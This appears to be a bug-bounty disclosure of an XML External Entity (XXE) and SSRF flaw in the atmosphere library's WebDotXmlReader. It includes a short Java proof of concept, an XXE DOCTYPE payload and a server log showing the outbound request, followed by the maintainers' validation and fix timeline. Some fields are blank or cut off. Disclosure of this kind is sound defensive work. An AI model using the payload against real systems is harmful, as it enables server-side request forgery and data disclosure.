Improper Restriction of XML External Entity Reference in atmosphere/atmosphere


Reported on

Oct 7th 2021


The atmosphere is vulnerable to SSRF ( Server Side Request Forgery ) via XML External Entity (XXE). An attacker that is able to provide a crafted XML file as input to the WebDotXmlReader() constructor in the "" file may allow an attacker to execute XML External Entities (XXE).

Proof of Concept


import org.atmosphere.util.WebDotXmlReader;

public class Poc {

    public static void main(String[] args) {        
        try {
            InputStream inputStream = new FileInputStream("C:\\Users\\[user]\\eclipse-workspace\\xxe_poc\\src\\main\\resources\\sample_ssrf.xml");
            WebDotXmlReader wxmlreader = new WebDotXmlReader(inputStream);
        } catch (Exception e) {


<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "">]>


└─# python3 -m http.server 8800
Serving HTTP on port 8800 ( ... - - [07/Oct/2021 16:39:07] "GET /text.txt HTTP/1.1" 200 -
We created a GitHub Issue asking the maintainers to create a a year ago
a year ago
We have contacted a member of the atmosphere team and are waiting to hear back a year ago
atmosphere/atmosphere maintainer validated this vulnerability a year ago
Srikanth Prathi has been awarded the disclosure bounty
The fix bounty is now up for grabs
atmosphere/atmosphere maintainer confirmed that a fix has been merged on efb38e a year ago
The fix bounty has been dropped
to join this conversation